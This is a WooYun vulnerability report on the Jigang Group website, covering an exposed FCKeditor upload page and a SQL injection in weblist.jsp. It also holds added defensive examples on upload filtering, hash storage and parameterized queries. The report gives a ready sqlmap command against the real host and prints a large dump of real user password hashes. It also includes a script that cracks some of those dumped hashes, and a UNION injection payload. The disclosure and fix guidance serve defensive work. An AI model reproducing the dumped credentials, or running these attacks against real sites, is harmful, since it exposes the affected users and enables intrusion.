
Vulnerability summary

Defect ID: wooyun-2014-088141

Title: 济钢集团有限公司 (Jigang Group Co., Ltd.) site: FCKeditor file manager exposure + SQL injection

Vendor: 济钢集团有限公司 (Jigang Group Co., Ltd.)

Author: 感染者

Submitted: 2014-12-22 15:14

Fixed: 2015-02-05 15:16

Published: 2015-02-05 15:16

Vulnerability type: sensitive information disclosure

Severity: High

Self-assessed Rank: 15

Status: handed to a third-party partner organization (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-12-22: Details reported to the vendor; awaiting vendor handling
2014-12-26: Vendor confirmed; details disclosed to the vendor only
2015-01-05: Details disclosed to core white hats and relevant domain experts
2015-01-15: Details disclosed to regular white hats
2015-01-25: Details disclosed to intern white hats
2015-02-05: Details disclosed to the public

Brief description:

Jigang Group Co., Ltd. website: editor vulnerability + injection vulnerability (large-scale information disclosure)

Detailed description:

The Jigang Group Co., Ltd. website exposes the FCKeditor file manager upload page and has a SQL injection in a JSP parameter; together they can lead to large-scale information disclosure.

Proof of vulnerability:

1. Editor
FCKeditor path:
http://www.jigang.com.cn/jgjtww/editor/filemanager/upload/test.html
Screenshot: 1.png

Note: the file manager upload test page is reachable, so a shell can be uploaded.
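The following is an added example, not code from the report and not FCKeditor's own code. It shows the filename policy an upload handler needs so that a reachable upload page cannot be used to drop a web shell: an extension whitelist rather than a blacklist, exactly one extension, no `;`, NUL or control characters, and a server-chosen random name. The whitelist, the handler name and the test filenames are assumptions for the example; the bypass patterns it rejects (script extension, double extension, `;` and NUL truncation, path traversal) are the classic ones.

```python
import re
import secrets

# Whitelist of types the site actually needs (assumed list for this example).
# Every server-side script type (jsp, jspx, asp, aspx, php, ...) is rejected
# simply by not being listed.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}

# Characters that have no business in an uploaded filename: control
# characters including NUL (truncation tricks) and ';' (the "shell.asp;.jpg"
# style of bypass). Directory separators are handled by stripping the path.
FORBIDDEN = re.compile(r"[\x00-\x1f;]")


class UploadRejected(ValueError):
    """Raised when the client-supplied filename fails the policy."""


def safe_upload_name(client_filename: str) -> str:
    """Return a server-chosen name for the stored file, or raise UploadRejected.

    Hypothetical hardened handler (not FCKeditor's code). Policy:
    - the client's directory part is ignored, so '../../x.jpg' is just 'x.jpg';
    - control characters and ';' are refused outright;
    - the name must be exactly 'base.ext': 'shell.jsp.jpg', '.htaccess' and
      extension-less names are refused;
    - the extension is lower-cased before the whitelist lookup, so 'SHELL.JsP'
      is treated like 'shell.jsp';
    - the stored name is random, so the client's base name is never reused
      and one user cannot overwrite another user's file.
    """
    name = client_filename.replace("\\", "/").rsplit("/", 1)[-1]
    if not name or FORBIDDEN.search(name):
        raise UploadRejected("illegal characters in filename")
    base, dot, ext = name.partition(".")
    if not base or not dot or not ext or "." in ext:
        raise UploadRejected("filename must be of the form base.ext")
    ext = ext.lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension .{ext} is not allowed")
    return f"{secrets.token_hex(8)}.{ext}"


def is_accepted(client_filename: str) -> bool:
    """True if the policy would store the file, False if it rejects it."""
    try:
        safe_upload_name(client_filename)
    except UploadRejected:
        return False
    return True


if __name__ == "__main__":
    for candidate in ("photo.PNG", "../../photo.jpg", "shell.jsp",
                      "shell.jsp.jpg", "shell.jsp;.jpg", "shell.jsp\x00.jpg"):
        print(repr(candidate), "accepted" if is_accepted(candidate) else "rejected")
```

Deleting test.html alone does not change this: the page is only a form, and whatever handler it posts to is what must enforce a policy like the one above or be removed.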
2. SQL injection
sqlmap command:
sqlmap -u "http://www.jigang.com.cn/jgjtww/weblist.jsp?cid=1321" --dbs
Screenshot: 2.png

Many databases are listed; based on experience, one is picked to look into further.
Testing the DHCC database:
Screenshot: 4.png

The C_USERNAME and C_PASSWORD information is then retrieved (the dump below shows the C_EMAIL and C_PASSWORD columns):
Screenshot: 3.png

Full output:

Database: DHCC
Table: T_USER
[144 entries]
+----------------------------+--------------------------+
| C_EMAIL | C_PASSWORD |
+----------------------------+--------------------------+
| NULL | IKRclNb97rSQsiiRC6sIhQ== |
| [email protected] | HzhwvidPbEmz4xoMZyiVfw== |
| [email protected] | SBAt7S9Xxu9JfBhKDqcKuA== |
| [email protected] | TBH6LiTuDXwTleQmPocSKA== |
| [email protected] | EwQKjytXY5r0ONO5Id3EEA== |
| [email protected] | 88mc5mWIwUCeMK1vKFz2/w== |
| [email protected] | VHO177TeDPg9abFskeaEgA== |
| NULL | ewA7PsQumJoppxJqRWew9A== |
| [email protected] | eKp4F0jCU/yDkvYmCbwgDQ== |
| NULL | 1B2M2Y8AsgTpgAmY7PhCfg== |
| NULL | DHS394QJpAIqLExaXKPuGQ== |
| [email protected] | 7AKLzqTaaTajIX9RhJeNEw== |
| [email protected] | VIKNACl0r3SN40mpd0cVwQ== |
| [email protected] | VIKNACl0r3SN40mpd0cVwQ== |
| NULL | 1B2M2Y8AsgTpgAmY7PhCfg== |
| [email protected] | THUSvRY3Uc4CISwL0tIO6Q== |
| [email protected] | QK0wilh78ri5RjBIk9YI1Q== |
| [email protected] | YohpIC/cznlw3bfv4EWIbg== |
| NULL | 1B2M2Y8AsgTpgAmY7PhCfg== |
| NULL | v3ikTG8qeUTbittU9zdipA== |
| [email protected] | SoGKmYCWVNzw4EcWZzIa8Q== |
| [email protected] | abhbBgzLkk6JWrbbqXA18Q== |
| [email protected] | zFJsA6GzFaWxBF7ng+8Lhw== |
| NULL | JPSLm81+NYMc3BhkYZyBMw== |
| [email protected] | UsaeOlczEIGCMzHE5p0/Lg== |
| NULL | 1B2M2Y8AsgTpgAmY7PhCfg== |
| [email protected] | nb9xpclY3exzkkKiZRTlbQ== |
| NULL | jWDRTqKKqQb/OaiFKQ2PFA== |
| NULL | 1B2M2Y8AsgTpgAmY7PhCfg== |
| 123456789 | TYCxf/kl3caIo+RYKVTvjA== |
| NULL | 1B2M2Y8AsgTpgAmY7PhCfg== |
| [email protected] | TYCxf/kl3caIo+RYKVTvjA== |
| [email protected] | eojsfqwnI6SqtCEuaMfYFA== |
| [email protected] | M3zqPVtS4m9MrK3O3RyizQ== |
| NULL | IwLKxo9x3GuQmDtUVdoicw== |
| NULL | 1B2M2Y8AsgTpgAmY7PhCfg== |
| ???? | aY1RoZ2KEhzlgUmde3AWaA== |
| [email protected] | IwLKxo9x3GuQmDtUVdoicw== |
| [email protected] | 4QrcOUm6Wau+VuBX8g+IPg== |
| wu | /KRvZB9SK09ykn8ReCjFlw== |
| NULL | 4QrcOUm6Wau+VuBX8g+IPg== |
| [email protected] | KMtY9/6faF+16SRtXbqmyQ== |
| [email protected] | 5lrH7HZx1XHzJ0GhZo2VUw== |
| [email protected] | 4QrcOUm6Wau+VuBX8g+IPg== |
| NULL | ogx7xR2Z2FOpFxVl+CHDOg== |
| [email protected] | q7Wyoc/DN2YXu0kieahO8A== |
| [email protected] | kbda5lb0L/GvVKd1xs5fkg== |
| dd | qSnj1vKJoH1OkRreQEt0OQ== |
| NULL | 1B2M2Y8AsgTpgAmY7PhCfg== |
| [email protected] | sdj8320NtwEccfww5670pA== |
| dd | Nuuh4eNDJ5hX6n9ppZcyTg== |
| [email protected] | 4RwEP84nkVEu3mh4XBjE0w== |
| [email protected] | xxXw54UtTTJltcl0QC/6/Q== |
| [email protected] | cHcGBmdKqXS0WjCMgIJUZA== |
| [email protected] | MmkpAYUDvF4tRgzmizGC/w== |
| dd | 4IOSu4ne247W+ymPjnKcFQ== |
| dd | d+Z4lCbRMeTYYuysTH0MXQ== |
| [email protected] | CtJ7Q5MiicrTsP92FtBRAw== |
| [email protected] | F5aavPPuhzcgBacTxf1oWw== |
| NULL | 1B2M2Y8AsgTpgAmY7PhCfg== |
| [email protected] | lyPGBE1v56AX/kwI4T4spg== |
| [email protected] | q4DywTH2H5foqfT1R/V/hg== |
| [email protected] | u5bBsXEdbrPu0Wz/W2GlYQ== |
| [email protected] | 8K7XQ8atQ3C/48OpTRUK3w== |
| [email protected] | E1fk4yDNw7k79ONI9QkbzQ== |
| [email protected] | lueSGJZetyySpUndWjMBEg== |
| [email protected] | 69j12P2cSFX/dJ1q+PsQvg== |
| NULL | 1B2M2Y8AsgTpgAmY7PhCfg== |
| NULL | 1B2M2Y8AsgTpgAmY7PhCfg== |
| [email protected] | oDzoaLw+8hF1xpLVXHfotQ== |
| NULL | mILdUNOWYCpGHnvLQ1CDlA== |
| NULL | v3ikTG8qeUTbittU9zdipA== |
| [email protected] | 8/g7St6byb4vfCYZH43a6w== |
| [email protected] | VPo2JeSEUfyWdEGfaz88jw== |
| [email protected] | cHcGBmdKqXS0WjCMgIJUZA== |
| [email protected] | /daGMofjTEWWFwYiwCD5/w== |
| [email protected] | ZwsUcorZkCrsujLiL6T2vQ== |
| NULL | 6TQSiXfouMaO32cfahl/eg== |
| NULL | kSeO18ACVNSqu6xIhRZJlg== |
| NULL | dOrT98G6whoxYg4v6KdEFA== |
| NULL | vN00FTpr5U47SMAAH0ltRA== |
| [email protected] | ktCCauTpzfreYnGPXdhMMw== |
| [email protected] | fDv+td9Bir7RpyTcfzmWeA== |
| [email protected] | Tvjw/mdrdzx8MnnW14UtpA== |
| [email protected] | 4QrcOUm6Wau+VuBX8g+IPg== |
| [email protected] | kfHVMpmAzidmH7LtP1ogsA== |
| NULL | p7WE5pFDQN2zmgEm6SeBgA== |
| NULL | kuFG40U//NP0ohY72K1ovg== |
| 777 | 3A+n3z0HkEoJKIvS0rtfQA== |
| [email protected] | X5/ESGAAQFmZM55+77o7eg== |
| NULL | 1B2M2Y8AsgTpgAmY7PhCfg== |
| [email protected] | g7TvWuS7NgyWYors2pdCAA== |
| [email protected] | yHjaigqri4CJdd1hlWzBkw== |
| NULL | udfg8WmHBAI1VOTvUTiMkw== |
| [email protected] | greLiJMumWibbD8pFOVjNw== |
| [email protected] | 4Ifj4CcLdlX7lwI88/MLuQ== |
| NULL | VKK/jAms5n01E6qhqnqg8w== |
| NULL | d6RG3hh8TpCBnFXOlodt/Q== |
| NULL | uzk4tkM8uaTrFiLJ8fe2TQ== |
| NULL | ICy5YqxZB1uWSwcVLSNLcA== |
| [email protected] | +tkWjVP8z2pRedPZgacWcg== |
| [email protected] | VY/gs68nvM1BU91pz2VD6A== |
| [email protected] | AulXK1qmPAyhevua4dMAlw== |
| NULL | aWw189UbxLd5Te/6eHUBFw== |
| [email protected] | RyeLK3CttmK2VkOb3/UdLA== |
| NULL | z80ghJXVZe9m59/5+Ydk2g== |
| NULL | JfnnlDI7RTiF9RgfG2JNCw== |
| 1 | uck/vf0qMFBOBdOwsyMH2g== |
| NULL | xMpCOKC5I4INzFCab3WEmw== |
| [email protected] | E8L3L/1VdLzpFPUsjMlSJw== |
| [email protected] | dcBTQud9P87YLQvINayeLA== |
| [email protected] | o2CIhS+0rdus+tDYUcY6hA== |
| [email protected] | LirSXtTangxaLLVdiM9ZLQ== |
| [email protected] | q56CAfVGrwXdN8l0YValdA== |
| NULL | 2lGppFt73kLtwahelAU2ZA== |
| [email protected] | gjaThN9fxSQQfVBgNJuMOA== |
| NULL | 1B2M2Y8AsgTpgAmY7PhCfg== |
| NULL | 1B2M2Y8AsgTpgAmY7PhCfg== |
| NULL | 1B2M2Y8AsgTpgAmY7PhCfg== |
| [email protected] | ZRMhP44BezLxtoRfOwTITQ== |
| [email protected] | v9kl+oYIS9AwD95/0F3dlw== |
| NULL | Rup1auw32OBr1BVPM2Balw== |
| [email protected] | s1lPHxeoIjP/QcQ3rzV07g== |
| [email protected] | CN62AHFz+LP2B0TFA6LGsQ== |
| [email protected] | hU5CXGFrk318b9ZBUWu4Bg== |
| NULL | 1B2M2Y8AsgTpgAmY7PhCfg== |
| [email protected] | dlR78kNHQd0FlGiKKiY1Iw== |
| [email protected] | MPg+IhpLqqGdtn1gDG60sg== |
| [email protected] | u3qmhr2oUNdBLNDeaeL72g== |
| NULL | 1B2M2Y8AsgTpgAmY7PhCfg== |
| NULL | TsGEAog2GtMjrC4eNSnROw== |
| NULL | 1B2M2Y8AsgTpgAmY7PhCfg== |
| z55234 | br52yftBG+l7Ow1It5GnyQ== |
| NULL | HzbBXWo9GNUujUk7yBh8uQ== |
| NULL | 2sdFNFoXzduN0Bg5Bo4qGw== |
| [email protected] | cllT25kNqSq8sQZAXuB2FA== |
| [email protected] | Y4cPH3luZJiDs/4IIpyAbA== |
| [email protected] | Jk0ZdCS4zhLPpmOoAcCD9Q== |
| [email protected] | fMtyfvA8Meo8WyYPbSh3IQ== |
| QUYINGCUN66 | JfnnlDI7RTiF9RgfG2JNCw== |
| [email protected] | pYlmvKqhnl3hBwJscfvz3Q== |
| [email protected] | RsTYHA1UROOTC9cWKWWKFA== |
| NULL | ISMvKXpXpadDiUoOSoAfww== |
| [email protected] | lY3qnKdfOiqBgL4wcKpUfw== |
+----------------------------+--------------------------+


Note: the amount of data is huge and only a very small part of it was tested. There is likely a large-scale risk of corporate private data being disclosed.
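Every C_PASSWORD value above is a 24-character base64 string ending in `==`, i.e. a 16-byte digest, and the same string `1B2M2Y8AsgTpgAmY7PhCfg==` recurs for many NULL-email rows. Several of the values are exactly base64 of the unsalted MD5 of a common password, which identifies the storage scheme. The following is an added example, not part of the report, that decodes a handful of values copied from the dump and checks them against a tiny wordlist; the wordlist is an assumption, and only the values listed were copied from the table.

```python
import base64
import hashlib

# Values copied from the T_USER dump above (a constructed subset, not the
# whole table). The last one is a control that the wordlist does not cover.
SAMPLE_HASHES = [
    "1B2M2Y8AsgTpgAmY7PhCfg==",   # recurs for many NULL-email rows
    "4QrcOUm6Wau+VuBX8g+IPg==",   # recurs for several rows
    "ISMvKXpXpadDiUoOSoAfww==",
    "xMpCOKC5I4INzFCab3WEmw==",
    "ICy5YqxZB1uWSwcVLSNLcA==",
    "lueSGJZetyySpUndWjMBEg==",
    "VIKNACl0r3SN40mpd0cVwQ==",
]

# Deliberately tiny wordlist (assumption); an audit would use a real one.
WORDLIST = ["", "1", "123", "123456", "111111", "admin", "password"]


def digest_length(value: str) -> int:
    """Number of raw bytes behind a base64 string; 16 points at MD5."""
    return len(base64.b64decode(value, validate=True))


def b64_md5(word: str) -> str:
    """The storage format the dump uses: base64 of the raw MD5 digest, no salt."""
    return base64.b64encode(hashlib.md5(word.encode("utf-8")).digest()).decode("ascii")


def crack(hashes, wordlist) -> dict:
    """Map each stored value to the plaintext that produces it, or None.

    Because there is no salt, one hash computation per wordlist entry covers
    every user at once: the lookup table is built once and reused, which is
    exactly why unsalted fast hashes are a disclosure risk on their own.
    """
    table = {b64_md5(word): word for word in wordlist}
    return {h: table.get(h) for h in hashes}


def summary(hashes, wordlist):
    """(total, cracked, empty-password count) as a quick risk figure."""
    found = crack(hashes, wordlist)
    cracked = sum(1 for v in found.values() if v is not None)
    empty = sum(1 for v in found.values() if v == "")
    return len(hashes), cracked, empty


if __name__ == "__main__":
    for stored, plain in crack(SAMPLE_HASHES, WORDLIST).items():
        print(stored, "->", repr(plain) if plain is not None else "not in wordlist")
    print("total/cracked/empty:", summary(SAMPLE_HASHES, WORDLIST))
```

The recurring `1B2M2Y8AsgTpgAmY7PhCfg==` is the MD5 of the empty string, so those accounts have no password at all. Fixing the injection does not help these users; the stored values need re-hashing with a salted, slow password hash on next login.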

Remediation:

FCKeditor: remove the unused file manager pages. test.html is only a form; the upload handler it posts to is what actually accepts the file, so that handler must be removed or disabled too, or restricted to authenticated users with an extension whitelist.
SQL injection: filtering special characters is not a reliable fix; bind cid as a query parameter (a PreparedStatement in the JSP) and validate it as an integer before use.
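As an added example, not from the report and not the site's actual JSP code, here is the injection pattern sqlmap exploited on `weblist.jsp?cid=`, the "filter special characters" approach, and the parameterized fix, all run against a constructed in-memory SQLite database. The T_WEBLIST table, its rows and the single T_USER row are made up; T_USER's column names come from the dump. The point is that a UNION payload in numeric context needs no quotes, so a character filter passes it through unchanged, while type-checking and binding the parameter stops it regardless of payload.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the site's database (invented data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE T_WEBLIST (CID INTEGER, TITLE TEXT);
        INSERT INTO T_WEBLIST VALUES (1321, 'Group news'), (1322, 'Notices');
        CREATE TABLE T_USER (C_EMAIL TEXT, C_PASSWORD TEXT);
        INSERT INTO T_USER VALUES ('admin@example.invalid', 'ISMvKXpXpadDiUoOSoAfww==');
    """)
    return db


def weblist_vulnerable(db, cid: str) -> set:
    """The pattern sqlmap found: the request parameter is spliced into the SQL text."""
    sql = "SELECT TITLE FROM T_WEBLIST WHERE CID = " + cid
    return {row[0] for row in db.execute(sql)}


def weblist_filtered(db, cid: str) -> set:
    """'Filter special characters': strips quotes, semicolons and comment dashes.

    A numeric-context injection needs none of those characters, so the
    filter changes nothing and the query is still injectable.
    """
    cleaned = "".join(c for c in cid if c not in "'\";-")
    return weblist_vulnerable(db, cleaned)


def weblist_fixed(db, cid: str) -> set:
    """Correct fix: validate the type, then bind the value as a parameter.

    In the site's JSP this corresponds to PreparedStatement.setInt(): the
    SQL text is fixed and cid can only ever be compared as a number.
    """
    if not cid.isdigit():
        raise ValueError("cid must be a positive integer")
    sql = "SELECT TITLE FROM T_WEBLIST WHERE CID = ?"
    return {row[0] for row in db.execute(sql, (int(cid),))}


def fixed_rejects(db, cid: str) -> bool:
    """True if the parameterized endpoint refuses the input before querying."""
    try:
        weblist_fixed(db, cid)
    except ValueError:
        return True
    return False


# Constructed payload: a UNION in numeric context, no quote characters needed.
PAYLOAD = "1321 UNION SELECT C_PASSWORD FROM T_USER"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", weblist_vulnerable(db, PAYLOAD))
    print("filtered:  ", weblist_filtered(db, PAYLOAD))
    print("fixed rejects payload:", fixed_rejects(db, PAYLOAD))
```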

Copyright notice: when reposting, credit the source: 感染者@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2014-12-26 16:14

Vendor reply:

CNVD confirms the described vulnerability. A direct handling channel with the site's operating organization has not yet been established; pending claim.

Latest status:

None